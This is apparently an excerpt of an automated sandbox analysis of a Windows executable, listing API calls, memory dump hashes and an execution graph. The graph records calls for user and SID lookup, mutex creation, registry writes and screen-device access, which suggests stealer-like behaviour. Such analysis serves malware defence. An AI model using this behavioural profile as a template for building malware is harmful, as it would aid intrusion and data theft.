                                                                                • Snapshot File: hcaresult_0_2_c90000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: DuplicateHandle
                                                                                • String ID:
                                                                                • API String ID: 3793708945-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                [Graph not preserved: first block c992c8; API call: LoadLibraryExW]
                                                                                APIs
                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,00C99971,00000800,00000000,00000000), ref: 00C99B82
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.300686903.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_c90000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                [Graph not preserved: first block c99b10; API call: LoadLibraryExW]
                                                                                APIs
                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,00C99971,00000800,00000000,00000000), ref: 00C99B82
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.300686903.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_c90000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                [Graph not preserved: first block c9ff38; API call: SetWindowLongW]
                                                                                APIs
                                                                                • SetWindowLongW.USER32(?,?,?), ref: 00C9FF9D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.300686903.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_c90000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: LongWindow
                                                                                • String ID:
                                                                                • API String ID: 1378638983-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                [Graph not preserved: first block c99890; API call: GetModuleHandleW]
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00C998F6
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.300686903.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_c90000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule
                                                                                • String ID:
                                                                                • API String ID: 4139908857-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • SetWindowLongW.USER32(?,?,?), ref: 00C9FF9D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.300686903.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_c90000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID: LongWindow
                                                                                • String ID:
                                                                                • API String ID: 1378638983-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.300511187.0000000000BED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BED000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_bed000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8c6ced9d0c9f6690be594cbf568882f55a05229423d0602ee79acece9868a76a
                                                                                • Instruction ID: dd1c6da267358e34439cd1d65abf1dc297de72cb9cdf9a4d5470e9b4db72a02a
                                                                                • Opcode Fuzzy Hash: 8c6ced9d0c9f6690be594cbf568882f55a05229423d0602ee79acece9868a76a
                                                                                • Instruction Fuzzy Hash: 9E11D376904280CFCB11CF10D9C4B16BFB1FB94324F24C6A9D8050B656C33AD85ACBA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.300542576.0000000000BFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_bfd000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9d35afff73f64a3ce4a9ad24b32e567c7a1d94a238c24113185269c1f0cd325c
                                                                                • Instruction ID: 6766b00c5565c21c08379b667851861c46eb30a9968c9f533c078670ec459020
                                                                                • Opcode Fuzzy Hash: 9d35afff73f64a3ce4a9ad24b32e567c7a1d94a238c24113185269c1f0cd325c
                                                                                • Instruction Fuzzy Hash: 21119075904284DFDB11CF10D5C4B25FBB2FB84314F24C6AED9494B656C33AD84ACB91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.300686903.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_c90000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7eb69fc6506cd37e5a37ecb1b95cea2ccb3ae632602636058bac76b84e2ec868
                                                                                • Instruction ID: 201afe3a3c5027b83b395c81c5b8b8c630a27709954a8048587db6e74d02d424
                                                                                • Opcode Fuzzy Hash: 7eb69fc6506cd37e5a37ecb1b95cea2ccb3ae632602636058bac76b84e2ec868
                                                                                • Instruction Fuzzy Hash: C912C5F1C91B468BDB90CF25E99818D3BA1B744328BD16A08D3631AAD4D7B419FECF44
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.300686903.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_c90000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 481fa49de4779aa62bfc987c73a0dc3c54767d2ea0673cdf93e23572b3a8521a
                                                                                • Instruction ID: 2ccb5325c5818ec3aa0f4b49c0fe87b5521b252cdd61fae3f21651adb827c563
                                                                                • Opcode Fuzzy Hash: 481fa49de4779aa62bfc987c73a0dc3c54767d2ea0673cdf93e23572b3a8521a
                                                                                • Instruction Fuzzy Hash: 82A17E32E0061ACFCF05DFE5C8885DEB7B2FF85300B15856AE916BB261DB31A955DB80
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.300686903.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_c90000_0XzeMRyE1e.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 485cd75ec4c9ae36890f72d4a61ad8639ac64d3058d4388a8eadca8ebb2a5a15
                                                                                • Instruction ID: 88e2586f36b20027ef5798d205e7b5de40f86b2e6819631ace707c716163304f
                                                                                • Opcode Fuzzy Hash: 485cd75ec4c9ae36890f72d4a61ad8639ac64d3058d4388a8eadca8ebb2a5a15
                                                                                • Instruction Fuzzy Hash: FBC11BB1C917468BDB94CF25E99818D3BA1BB45328FD16A08D3622B6D0D7B418FECF44
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Execution Graph

                                                                                Execution Coverage:11%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:12.3%
                                                                                Total number of Nodes:2000
                                                                                Total number of Limit Nodes:79
19006 413c11 18962->19006 18963->18934 18966 4186af 18965->18966 18967 4186aa 18965->18967 18966->18947 19067 418405 18967->19067 19286 409280 18969->19286 18979 418ee1 ___scrt_is_nonwritable_in_current_image 18978->18979 18980 4154df __dosmaperr 18978->18980 18981 41a122 __fassign 37 API calls 18979->18981 18980->18943 18982 418ef2 18981->18982 18983 418fd6 __fassign 37 API calls 18982->18983 18984 418f1c 18983->18984 18985 416437 __dosmaperr 14 API calls 18984->18985 18988 418f5b 18984->18988 18986 418f51 18985->18986 18987 417ea2 __wsopen_s 25 API calls 18986->18987 18987->18988 18988->18943 18990 413648 ___scrt_fastfail 18989->18990 18991 4136f3 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 18990->18991 18992 41373e ___scrt_fastfail 18991->18992 18992->18937 18994 41538d __fassign 23 API calls 18993->18994 18995 413423 18994->18995 18995->18940 18997 412fe5 18996->18997 18998 413bf2 18997->18998 19012 414154 18998->19012 19002 413c03 19003 413c0e 19002->19003 19026 414190 19002->19026 19003->18962 19005 413bfb 19005->18962 19007 413c24 19006->19007 19008 413c1a 19006->19008 19007->18963 19009 414139 ___vcrt_uninitialize_ptd 6 API calls 19008->19009 19010 413c1f 19009->19010 19011 414190 ___vcrt_uninitialize_locks DeleteCriticalSection 19010->19011 19011->19007 19013 41415d 19012->19013 19015 414186 19013->19015 19016 413bf7 19013->19016 19030 414568 19013->19030 19017 414190 ___vcrt_uninitialize_locks DeleteCriticalSection 19015->19017 19016->19005 19018 414106 19016->19018 19017->19016 19048 414479 19018->19048 19021 41411b 19021->19002 19024 414136 19024->19002 19027 41419b 19026->19027 19029 4141ba 19026->19029 19028 4141a5 DeleteCriticalSection 19027->19028 19028->19028 19028->19029 19029->19005 19035 414430 19030->19035 19033 4145a0 InitializeCriticalSectionAndSpinCount 19034 41458b 19033->19034 19034->19013 19036 41446b 19035->19036 19037 414448 19035->19037 19036->19033 19036->19034 19037->19036 19041 414384 19037->19041 19040 
41445d GetProcAddress 19040->19036 19045 414393 ___vcrt_InitializeCriticalSectionEx 19041->19045 19042 4143ac LoadLibraryExW 19044 4143c7 GetLastError 19042->19044 19042->19045 19043 414425 19043->19036 19043->19040 19044->19045 19045->19042 19045->19043 19046 41440e FreeLibrary 19045->19046 19047 4143e6 LoadLibraryExW 19045->19047 19046->19045 19047->19045 19049 414430 ___vcrt_InitializeCriticalSectionEx 5 API calls 19048->19049 19050 414493 19049->19050 19051 4144ac TlsAlloc 19050->19051 19052 414110 19050->19052 19052->19021 19053 41452a 19052->19053 19054 414430 ___vcrt_InitializeCriticalSectionEx 5 API calls 19053->19054 19055 414544 19054->19055 19056 41455f TlsSetValue 19055->19056 19057 414129 19055->19057 19056->19057 19057->19024 19058 414139 19057->19058 19059 414143 19058->19059 19061 414149 19058->19061 19062 4144b4 19059->19062 19061->19021 19063 414430 ___vcrt_InitializeCriticalSectionEx 5 API calls 19062->19063 19064 4144ce 19063->19064 19065 4144e6 TlsFree 19064->19065 19066 4144da 19064->19066 19065->19066 19066->19061 19068 41840e 19067->19068 19072 418424 19067->19072 19068->19072 19073 418431 19068->19073 19070 41841b 19070->19072 19086 418583 19070->19086 19072->18966 19074 41843a 19073->19074 19075 41843d 19073->19075 19074->19070 19094 41ed4e 19075->19094 19080 41844f 19083 419831 _free 14 API calls 19080->19083 19084 41847e 19083->19084 19084->19070 19085 419831 _free 14 API calls 19085->19080 19087 4185f4 19086->19087 19092 418592 19086->19092 19087->19072 19088 41f00b WideCharToMultiByte __cftof 19088->19092 19089 41dfbf __dosmaperr 14 API calls 19089->19092 19090 4185f8 19091 419831 _free 14 API calls 19090->19091 19091->19087 19092->19087 19092->19088 19092->19089 19092->19090 19093 419831 _free 14 API calls 19092->19093 19093->19092 19095 41ed57 19094->19095 19099 418444 19094->19099 19129 41a1df 19095->19129 19100 41f0ef GetEnvironmentStringsW 19099->19100 19101 41f106 19100->19101 19111 41f15c 19100->19111 19104 41f00b __cftof 
WideCharToMultiByte 19101->19104 19102 41f165 FreeEnvironmentStringsW 19103 418449 19102->19103 19103->19080 19112 418484 19103->19112 19105 41f11f 19104->19105 19106 419d1a __fread_nolock 15 API calls 19105->19106 19105->19111 19107 41f12f 19106->19107 19108 41f00b __cftof WideCharToMultiByte 19107->19108 19109 41f147 19107->19109 19108->19109 19110 419831 _free 14 API calls 19109->19110 19110->19111 19111->19102 19111->19103 19113 418499 19112->19113 19114 41dfbf __dosmaperr 14 API calls 19113->19114 19125 4184c0 19114->19125 19115 419831 _free 14 API calls 19117 41845a 19115->19117 19116 418525 19116->19115 19117->19085 19118 41dfbf __dosmaperr 14 API calls 19118->19125 19119 418527 19280 418554 19119->19280 19120 418f7c ___std_exception_copy 25 API calls 19120->19125 19123 419831 _free 14 API calls 19123->19116 19124 418547 19126 417ecf __wsopen_s 11 API calls 19124->19126 19125->19116 19125->19118 19125->19119 19125->19120 19125->19124 19127 419831 _free 14 API calls 19125->19127 19128 418553 19126->19128 19127->19125 19130 41a1f0 19129->19130 19131 41a1ea 19129->19131 19132 41a69f __dosmaperr 6 API calls 19130->19132 19153 41a1f6 19130->19153 19133 41a660 __dosmaperr 6 API calls 19131->19133 19134 41a20a 19132->19134 19133->19130 19135 41dfbf __dosmaperr 14 API calls 19134->19135 19134->19153 19137 41a21a 19135->19137 19136 418fd6 __fassign 37 API calls 19138 41a278 19136->19138 19139 41a222 19137->19139 19140 41a237 19137->19140 19142 41a69f __dosmaperr 6 API calls 19139->19142 19143 41a69f __dosmaperr 6 API calls 19140->19143 19141 41a26f 19154 41eb95 19141->19154 19150 41a22e 19142->19150 19144 41a243 19143->19144 19145 41a247 19144->19145 19146 41a256 19144->19146 19147 41a69f __dosmaperr 6 API calls 19145->19147 19148 419f50 __dosmaperr 14 API calls 19146->19148 19147->19150 19151 41a261 19148->19151 19149 419831 _free 14 API calls 19149->19153 19150->19149 19152 419831 _free 14 API calls 19151->19152 19152->19153 19153->19136 19153->19141 19155 41ecae 
__fassign 37 API calls 19154->19155 19156 41eba8 19155->19156 19173 41e93e 19156->19173 19159 41ebc1 19159->19099 19160 419d1a __fread_nolock 15 API calls 19161 41ebd2 19160->19161 19168 41ec04 19161->19168 19180 41eda9 19161->19180 19164 419831 _free 14 API calls 19166 41ec12 19164->19166 19165 41ebff 19166->19099 19168->19164 19170 41ec1a 19174 4157f5 __fassign 37 API calls 19173->19174 19175 41e950 19174->19175 19176 41e971 19175->19176 19177 41e95f GetOEMCP 19175->19177 19178 41e976 GetACP 19176->19178 19179 41e988 19176->19179 19177->19179 19178->19179 19179->19159 19179->19160 19181 41e93e 39 API calls 19180->19181 19182 41edc9 19181->19182 19183 41ee3f ___scrt_fastfail 19182->19183 19185 41ee03 IsValidCodePage 19182->19185 19184 4139d2 _ValidateLocalCookies 5 API calls 19183->19184 19186 41ebf7 19184->19186 19185->19183 19187 41ee15 19185->19187 19186->19165 19186->19170 19188 41ee44 GetCPInfo 19187->19188 19190 41ee1e ___scrt_fastfail 19187->19190 19188->19183 19188->19190 19199 41ea14 19190->19199 19281 418561 19280->19281 19282 41852d 19280->19282 19283 418578 19281->19283 19284 419831 _free 14 API calls 19281->19284 19282->19123 19285 419831 _free 14 API calls 19283->19285 19284->19281 19285->19282 19287 409357 19286->19287 19288 409299 19286->19288 19304 407050 19287->19304 19289 4120d0 27 API calls 19288->19289 19290 4092a8 19289->19290 19291 402150 55 API calls 19290->19291 19292 4092b0 19291->19292 19315 4059c0 GetTempPathW 19292->19315 19294 4092c0 19295 412580 27 API calls 19294->19295 19296 4092cd 19295->19296 19297 4128e0 27 API calls 19296->19297 19298 40930d 19297->19298 19299 4120d0 27 API calls 19298->19299 19300 409340 19299->19300 19301 402150 55 API calls 19300->19301 19302 40934b 19301->19302 19303 412580 27 API calls 19302->19303 19303->19287 19324 402c50 GetUserNameW GetProcessHeap HeapAlloc GetUserNameW 19304->19324 19306 407063 19338 402e50 19306->19338 19308 407070 CreateMutexW GetLastError 19310 407188 19308->19310 19311 4154ef 23 
API calls 19310->19311 19312 40718f 19311->19312 19313 417eb2 25 API calls 19312->19313 19314 407194 19313->19314 19316 405a00 19315->19316 19316->19316 19317 4122f0 27 API calls 19316->19317 19318 405a1f 19317->19318 19319 411c40 27 API calls 19318->19319 19321 405a59 19319->19321 19320 405a9e 19320->19294 19321->19320 19322 417eb2 25 API calls 19321->19322 19323 405ab6 19322->19323 19325 402e12 7 API calls 19324->19325 19326 402cad LookupAccountNameW GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 19324->19326 19325->19306 19326->19325 19327 402cf5 19326->19327 19327->19325 19328 402cfd LookupAccountNameW 19327->19328 19328->19325 19329 402d1c ConvertSidToStringSidW 19328->19329 19329->19325 19330 402d2f 19329->19330 19331 412440 27 API calls 19330->19331 19332 402da5 19331->19332 19333 412440 27 API calls 19332->19333 19335 402dd9 19333->19335 19334 402dff 19334->19306 19335->19334 19336 417eb2 25 API calls 19335->19336 19337 402e47 19336->19337 19348 4030bb 19338->19348 19349 402e7e 19338->19349 19339 412440 27 API calls 19345 4030ee 19339->19345 19340 40315c 19342 412570 27 API calls 19340->19342 19341 412440 27 API calls 19341->19349 19344 403161 19342->19344 19343 403144 19343->19308 19345->19343 19346 417eb2 25 API calls 19345->19346 19346->19340 19347 412b90 27 API calls 19347->19349 19348->19339 19349->19340 19349->19341 19349->19345 19349->19347 19349->19348 21434 424aa9 21435 424ab5 ___scrt_is_nonwritable_in_current_image 21434->21435 21442 419123 EnterCriticalSection 21435->21442 21437 424ac0 21443 424b08 21437->21443 21442->21437 21444 424b17 21443->21444 21445 424b2a 21443->21445 21446 416437 __dosmaperr 14 API calls 21444->21446 21448 424b78 21445->21448 21449 424b3c 21445->21449 21447 424b1c 21446->21447 21450 417ea2 __wsopen_s 25 API calls 21447->21450 21451 416437 __dosmaperr 14 API calls 21448->21451 21464 424a3c 21449->21464 21452 424ad6 21450->21452 21453 424b7d 21451->21453 21461 424aff 21452->21461 21455 417ea2 __wsopen_s 25 API calls 
21453->21455 21455->21452 21457 418f7c ___std_exception_copy 25 API calls 21458 424b93 21457->21458 21458->21452 21459 417ecf __wsopen_s 11 API calls 21458->21459 21460 424bad 21459->21460 21468 41916b LeaveCriticalSection 21461->21468 21463 424aea 21465 424a49 21464->21465 21466 424496 41 API calls 21465->21466 21467 424a9c 21465->21467 21466->21465 21467->21452 21467->21457 21468->21463 17240 40ad42 17263 4120d0 17240->17263 17242 40ad53 17243 4120d0 27 API calls 17242->17243 17244 40ad69 17243->17244 17277 405560 17244->17277 17246 40ad70 17247 4120d0 27 API calls 17246->17247 17248 40ad81 17247->17248 17324 402150 17248->17324 17250 417eb2 25 API calls 17251 40b0a9 17250->17251 17252 417eb2 25 API calls 17251->17252 17254 40b0ae 17252->17254 17253 40ad88 17253->17250 17255 417eb2 25 API calls 17254->17255 17256 40b0b3 17255->17256 17257 417eb2 25 API calls 17256->17257 17258 40b0b8 17257->17258 17413 412eca 17258->17413 17264 4120f5 17263->17264 17265 4120fc 17264->17265 17266 41212f 17264->17266 17267 41214e 17264->17267 17265->17242 17268 412184 17266->17268 17269 412136 17266->17269 17272 412f2a 27 API calls 17267->17272 17275 412143 __fread_nolock 17267->17275 17270 402020 Concurrency::cancel_current_task 27 API calls 17268->17270 17271 412f2a 27 API calls 17269->17271 17273 41213c 17270->17273 17271->17273 17272->17275 17274 417eb2 25 API calls 17273->17274 17273->17275 17276 41218e 17274->17276 17275->17242 17278 40567e 17277->17278 17285 405579 17277->17285 17278->17246 17279 4120d0 27 API calls 17279->17285 17280 402150 55 API calls 17280->17285 17281 405699 17418 412570 17281->17418 17282 412440 27 API calls 17282->17285 17284 40569e 17286 417eb2 25 API calls 17284->17286 17285->17278 17285->17279 17285->17280 17285->17281 17285->17282 17285->17284 17287 4056a3 GetTempPathW 17286->17287 17289 4056f0 17287->17289 17289->17289 17421 4122f0 17289->17421 17291 40570f 17437 411c40 17291->17437 17293 405748 17294 405763 17293->17294 17451 411dd0 17293->17451 
17295 412440 27 API calls 17294->17295 17296 405796 17295->17296 17298 4120d0 27 API calls 17296->17298 17299 4057a5 17298->17299 17300 402150 55 API calls 17299->17300 17301 4057ad 17300->17301 17468 412580 17301->17468 17303 417eb2 25 API calls 17306 4058bd 17303->17306 17304 4057bb 17304->17303 17305 4058a6 17304->17305 17305->17246 17307 4120d0 27 API calls 17306->17307 17308 4058d9 17307->17308 17309 402150 55 API calls 17308->17309 17310 4058e1 17309->17310 17311 4120d0 27 API calls 17310->17311 17312 4058f9 17311->17312 17313 402150 55 API calls 17312->17313 17314 405900 17313->17314 17315 4120d0 27 API calls 17314->17315 17316 405914 17315->17316 17317 402150 55 API calls 17316->17317 17318 40591b 17317->17318 17319 412580 27 API calls 17318->17319 17325 411c40 27 API calls 17324->17325 17326 40217c 17325->17326 17327 4021d1 17326->17327 17328 411dd0 27 API calls 17326->17328 17519 411f30 17327->17519 17328->17326 17330 402336 17331 417eb2 25 API calls 17330->17331 17348 40235c 17330->17348 17332 402374 ___scrt_fastfail 17331->17332 17334 4023a2 RegOpenKeyExA 17332->17334 17333 4021dd ___scrt_fastfail 17333->17330 17346 412440 27 API calls 17333->17346 17335 4023cb RegQueryValueExA 17334->17335 17336 4023ef RegCloseKey 17334->17336 17335->17336 17337 402412 17336->17337 17337->17337 17338 412440 27 API calls 17337->17338 17340 40242a 17338->17340 17339 402492 17339->17253 17340->17339 17341 417eb2 25 API calls 17340->17341 17342 4024a9 RegOpenKeyExA 17341->17342 17344 4024e3 RegSetValueExA 17342->17344 17345 40250d RegCloseKey 17342->17345 17344->17345 17347 40251e 17345->17347 17346->17330 17349 4025c4 17347->17349 17350 417eb2 25 API calls 17347->17350 17348->17253 17349->17253 17351 4025d7 GdiplusStartup 17350->17351 17524 412190 17351->17524 17355 402641 GetDC 17356 4120d0 27 API calls 17355->17356 17357 402728 17356->17357 17358 402150 27 API calls 17357->17358 17359 402730 17358->17359 17360 4120d0 27 API calls 17359->17360 17361 402748 17360->17361 
17362 402150 27 API calls 17361->17362 17363 40274f 17362->17363 17364 4120d0 27 API calls 17363->17364 17540 412def 17413->17540 17416 413b86 Concurrency::cancel_current_task RaiseException 17417 412ee9 17416->17417 17476 412f0a 17418->17476 17424 412306 17421->17424 17425 412333 17421->17425 17422 412427 17423 412b80 27 API calls 17422->17423 17435 412398 __fread_nolock 17423->17435 17424->17291 17425->17422 17426 412422 17425->17426 17428 412387 17425->17428 17432 4123ae 17425->17432 17429 402020 Concurrency::cancel_current_task 27 API calls 17426->17429 17427 417eb2 25 API calls 17430 412431 17427->17430 17428->17426 17431 412392 17428->17431 17429->17422 17433 412f2a 27 API calls 17431->17433 17434 412f2a 27 API calls 17432->17434 17432->17435 17433->17435 17434->17435 17435->17427 17436 412409 17435->17436 17436->17291 17441 411c5b 17437->17441 17450 411d35 __fread_nolock 17437->17450 17438 411dc2 17439 412b80 27 API calls 17438->17439 17440 411dc7 17439->17440 17442 402020 Concurrency::cancel_current_task 27 API calls 17440->17442 17441->17438 17443 411ce2 17441->17443 17444 411cb8 17441->17444 17449 411cc9 __fread_nolock 17441->17449 17441->17450 17445 411dcc 17442->17445 17447 412f2a 27 API calls 17443->17447 17443->17449 17444->17440 17446 412f2a 27 API calls 17444->17446 17446->17449 17447->17449 17448 417eb2 25 API calls 17448->17438 17449->17448 17449->17450 17450->17293 17452 411e0a 17451->17452 17453 411dea 17451->17453 17454 411f16 17452->17454 17455 411e1c 17452->17455 17453->17293 17456 412b80 27 API calls 17454->17456 17458 411e79 17455->17458 17459 411e4f 17455->17459 17457 411f1b 17456->17457 17460 402020 Concurrency::cancel_current_task 27 API calls 17457->17460 17463 412f2a 27 API calls 17458->17463 17466 411e60 __fread_nolock 17458->17466 17459->17457 17461 411e5a 17459->17461 17460->17466 17462 412f2a 27 API calls 17461->17462 17462->17466 17463->17466 17464 417eb2 25 API calls 17465 411f25 17464->17465 17466->17464 17467 411edd 
__fread_nolock 17466->17467 17467->17293 17469 4125ed 17468->17469 17470 4125a3 17468->17470 17472 4125fc 17469->17472 17489 4128e0 17469->17489 17470->17469 17471 4125ac 17470->17471 17484 412b90 17471->17484 17472->17304 17475 4125b5 17475->17304 17481 412e7e 17476->17481 17479 413b86 Concurrency::cancel_current_task RaiseException 17480 412f29 17479->17480 17482 412d9f std::exception::exception 26 API calls 17481->17482 17483 412e90 17482->17483 17483->17479 17485 412ba4 17484->17485 17488 412bb5 __fread_nolock 17485->17488 17504 412c50 17485->17504 17487 412c3b 17487->17475 17488->17475 17490 412a1c 17489->17490 17491 412905 17489->17491 17492 412b80 27 API calls 17490->17492 17494 412940 17491->17494 17495 41296a 17491->17495 17493 412a21 17492->17493 17496 402020 Concurrency::cancel_current_task 27 API calls 17493->17496 17494->17493 17497 41294b 17494->17497 17499 412f2a 27 API calls 17495->17499 17502 412951 __fread_nolock 17495->17502 17496->17502 17498 412f2a 27 API calls 17497->17498 17498->17502 17499->17502 17500 417eb2 25 API calls 17501 412a2b 17500->17501 17502->17500 17503 4129da __fread_nolock 17502->17503 17503->17472 17505 412d77 17504->17505 17506 412c75 17504->17506 17507 412b80 27 API calls 17505->17507 17510 412cb0 17506->17510 17511 412cd7 17506->17511 17508 412d7c 17507->17508 17509 402020 Concurrency::cancel_current_task 27 API calls 17508->17509 17517 412cc1 __fread_nolock 17509->17517 17510->17508 17512 412cbb 17510->17512 17514 412f2a 27 API calls 17511->17514 17511->17517 17513 412f2a 27 API calls 17512->17513 17513->17517 17514->17517 17515 417eb2 25 API calls 17516 412d86 17515->17516 17517->17515 17518 412d3f __fread_nolock 17517->17518 17518->17487 17520 411f61 17519->17520 17521 411f3e 17519->17521 17520->17333 17521->17520 17522 417eb2 25 API calls 17521->17522 17523 411fac 17522->17523 17525 4121a6 17524->17525 17530 4121d9 17524->17530 17525->17355 17526 4122d7 17527 412b80 27 API calls 17526->17527 17535 41223f 17527->17535 
17528 417eb2 25 API calls 17532 4122e1 17528->17532 17529 4122d2 17531 402020 Concurrency::cancel_current_task 27 API calls 17529->17531 17530->17526 17530->17529 17533 412255 17530->17533 17534 41222e 17530->17534 17531->17526 17533->17535 17538 412f2a 27 API calls 17533->17538 17534->17529 17536 412239 17534->17536 17535->17528 17539 4122b6 17535->17539 17537 412f2a 27 API calls 17536->17537 17537->17535 17538->17535 17539->17355 17541 412d9f std::exception::exception 26 API calls 17540->17541 17542 412e01 17541->17542 17542->17416 19350 406b6b GetFileAttributesA 19351 406b77 19350->19351 19352 406c37 19351->19352 19353 407039 19351->19353 19357 412440 27 API calls 19352->19357 19354 417eb2 25 API calls 19353->19354 19355 40703e 19354->19355 19356 417eb2 25 API calls 19355->19356 19358 407043 19356->19358 19359 407008 19357->19359 19360 417eb2 25 API calls 19358->19360 19361 407048 19360->19361 19362 40704d 19361->19362 19363 417eb2 25 API calls 19361->19363 19363->19362 16866 401900 16871 412440 16866->16871 16868 401911 16886 413196 16868->16886 16875 412456 16871->16875 16876 41247e 16871->16876 16872 41255c 16908 412b80 16872->16908 16874 412561 16911 402020 16874->16911 16875->16868 16876->16872 16878 4124c6 16876->16878 16879 4124eb 16876->16879 16878->16874 16882 412f2a 27 API calls 16878->16882 16883 4124d7 __fread_nolock 16879->16883 16889 412f2a 16879->16889 16882->16883 16884 41253e 16883->16884 16903 417eb2 16883->16903 16884->16868 17170 413169 16886->17170 16892 412f2f 16889->16892 16891 412f49 16891->16883 16892->16891 16894 412f4b 16892->16894 16917 417f03 16892->16917 16935 417f1d 16892->16935 16895 402020 Concurrency::cancel_current_task 16894->16895 16897 412f55 16894->16897 16924 413b86 16895->16924 16899 413b86 Concurrency::cancel_current_task RaiseException 16897->16899 16898 40203c 16927 413b04 16898->16927 16901 413452 16899->16901 16904 417e3e __wsopen_s 25 API calls 16903->16904 16905 417ec1 16904->16905 16906 417ecf __wsopen_s 11 API 
calls 16905->16906 16907 417ece 16906->16907 17159 412eea 16908->17159 16912 40202e Concurrency::cancel_current_task 16911->16912 16913 413b86 Concurrency::cancel_current_task RaiseException 16912->16913 16914 40203c 16913->16914 16915 413b04 ___std_exception_copy 26 API calls 16914->16915 16916 402063 16915->16916 16922 419d1a __dosmaperr 16917->16922 16918 419d58 16938 416437 16918->16938 16919 419d43 RtlAllocateHeap 16921 419d56 16919->16921 16919->16922 16921->16892 16922->16918 16922->16919 16923 417f1d __dosmaperr 2 API calls 16922->16923 16923->16922 16925 413bd0 RaiseException 16924->16925 16926 413ba0 16924->16926 16925->16898 16926->16925 16928 413b11 16927->16928 16934 402063 16927->16934 16929 417f03 ___std_exception_copy 15 API calls 16928->16929 16928->16934 16930 413b2e 16929->16930 16933 413b3e 16930->16933 17107 418f7c 16930->17107 17116 417997 16933->17116 16934->16883 17148 417f4a 16935->17148 16941 41a279 GetLastError 16938->16941 16940 41643c 16940->16921 16942 41a290 16941->16942 16943 41a296 16941->16943 16964 41a660 16942->16964 16961 41a29c SetLastError 16943->16961 16969 41a69f 16943->16969 16949 41a2c4 16950 41a2e3 16949->16950 16951 41a2cc 16949->16951 16952 41a69f __dosmaperr 6 API calls 16950->16952 16953 41a69f __dosmaperr 6 API calls 16951->16953 16954 41a2ef 16952->16954 16955 41a2da 16953->16955 16956 